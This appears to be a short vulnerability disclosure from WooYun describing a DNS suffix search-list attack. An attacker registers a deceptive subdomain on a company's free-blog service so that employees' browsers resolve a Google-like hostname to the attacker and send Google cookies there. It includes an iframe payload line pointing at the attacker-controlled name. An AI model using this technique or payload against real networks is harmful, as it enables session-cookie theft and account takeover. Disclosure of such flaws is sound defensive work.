WooYun.org

Scenario ：
1.Company A.COM provide secondary domain registation for their customers ( eg. free blog system) .People can register any username they want, from example test . Then his space will be test.A.com. This works fine.
2.Company's internal network using a dhcp server which automatically adds an A.COM dns suffix to their client.
An attack wanna gather some employees' gmail account. He then can easily register a username like hack.www.google.com then the full domain name will be hack.www.google.com.A.com
When A.com 's employees browser the web site contains a iframe such as
<iframe src="https://hack.www.google.com/accounts" >fuck it up</iframe>
Employees's system will
1. try to resolve hack.www.google.com then get a false answer(NX Domain).
2.then try hack.www.google.com.A.com will get attacker's host IP addr.!!!
But the browser doesn't know this & will happily send google's cookies to the attacker's web server.
Success on windows XP /Linux Ubuntu 11.04 IE FF Chrome~:) Failed on win7 cos its only add dns suffix to the dnsname doesn't contain a '.'
GAME OVER!!!
Use your brains and think more potential attack vectors!!